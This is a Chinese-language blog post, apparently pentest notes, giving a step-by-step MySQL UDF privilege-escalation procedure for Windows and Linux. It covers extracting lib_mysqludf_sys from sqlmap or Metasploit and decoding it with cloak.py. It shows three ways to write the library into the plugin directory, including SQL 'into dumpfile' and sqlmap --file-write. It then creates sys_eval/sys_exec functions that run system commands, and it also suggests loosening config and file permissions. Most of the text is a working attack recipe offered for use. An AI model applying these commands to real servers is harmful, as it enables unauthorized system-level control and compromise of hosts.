UDF提权

UDF提权的原理

  1. MySQL数据库
  2. 用户自定义的MySQL函数就叫UDF(User Define Function)
  3. 提权满足的要求
    1. MySQL进程权限是系统权限(Windows下的System,Linux下Root)
    2. 拥有数据库root账号和密码
    3. 能够正常连接MySQL

Windows下UDF提权

Mysql版本 > 5.1

寻找插件目录

show variables like “%plugin%”;

查看数据库版本

select version();

提权方式

准备

  1. 从Sqlmap的\data\udf\mysql\windows\32或者64
  2. 或者从metasploit的/usr/share/metasploit-framework/data/exploits/mysql/*32.dll或者*64.dll(这是指mysql是32位还是64位)把lib_mysqludf_sys.dll_文件拿出来
  3. 然后再从Sqlmap的\extra\cloak把cloak.py拿出来
  4. 然后执行命令,cloak.py -d -i lib_mysqludf_sys.dll_ -o udf.dll(这里是需要把文件解码出来才能使用,从metasploit拿出来的不用解码)
  5. 然后需要打开Mysql的配置文件my.ini
  6. 加入plugin_dir=””和secure-file-priv=””在文件里面的[mysqld]的下面

(第一种导入方法)然后把udf.dll放去C:\phpstudy_pro\Extensions\MySQL5.7.26\lib\plugin里面(假如没有lib\plugin文件夹,需要自己创建)(别的方法在下面)

(第二种导入方法)把解码好的udf.dll放进winhex,然后复制出16进制,select 0x十六进制 into dumpfile "C:\\phpstudy\\PHPTutorial\\MySQL\\lib\\plugin\\udf.dll"

(第三种导入方法)sqlmap -d "mysql://root:[email protected]:3306/mysql" --file-write="/home/l/udf.dll" --file-dest="C:/phpstudy_pro/Extensions/MySQL5.7.26/lib/plugin/udf.dll"

提权

登录数据库

CREATE FUNCTION sys_eval/sys_exec RETURNS STRING SONAME ‘udf.dll’;(创建一个函数)

sys_eval是命令执行,sys_exec是运行程序

sys_eval输错命令MySQL不会闪退,sys_exec输错程序名会闪退

select sys_eval/sys_exec(‘whoami’);(这时就发现可以利用数据库执行cmd命令)

 

Mysql版本 < 5.1

上传文件到c:\windows\system32就可以了,然后步骤和上面的一样

 

Linux下UDF提权

提权方式

准备

  1. 从Sqlmap的\data\udf\mysql\linux\32或者64
  2. 或者从metasploit的/usr/share/metasploit-framework/data/exploits/mysql/*32.so或者*64.so(这是指mysql是32位还是64位)把文件拿出来
  3. 然后再从Sqlmap的\extra\cloak把cloak.py拿出来
  4. 然后执行命令,cloak.py -d -i lib_mysqludf_sys.dll_ -o udf.so(这里是需要把文件解码出来才能使用,从metasploit拿出来的不用解码)
  5. 然后需要打开Mysql的配置文件my.cnf
  6. 加入plugin_dir=”/usr/lib64/mysql/plugin”在文件里面的[mysqld]的下面

(第一种导入方法)然后把udf.so放去/usr/lib64/mysql/plugin里面(假如没有plugin文件夹,需要自己创建)(别的方法在下面)(chmod 777 /usr/lib64/mysql/plugin记得给权限)
(第二种导入方法)把解码好的udf.so放进winhex,然后复制出16进制,into dumpfile "/home/l/udf.so" select unhex('16进制') into dumpfile '/usr/lib64/mysql/plugin/udf.so';
(第三种导入方法)sqlmap -d "mysql://root:[email protected]:3306/mysql" --file-write="/home/l/udf.dll" --file-dest="/usr/lib64/mysql/plugin/udf.so"

提权

登录数据库

CREATE FUNCTION sys_eval/sys_exec RETURNS STRING SONAME ‘udf.so’;(创建一个函数)

sys_eval是命令执行,sys_exec是运行程序

sys_eval输错命令MySQL不会闪退,sys_exec输错程序名会闪退

select sys_eval/sys_exec(‘whoami’);(这时就发现可以利用数据库执行cmd命令)

其它

删除函数
drop function 函数名;

利用ADS创建文件夹
select ‘xxx’ into dumpfile ‘C:\\MySQL\\lib::$INDEX_ALLOCATION’;(实验没成功)

暂无评论

发送评论 编辑评论


|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇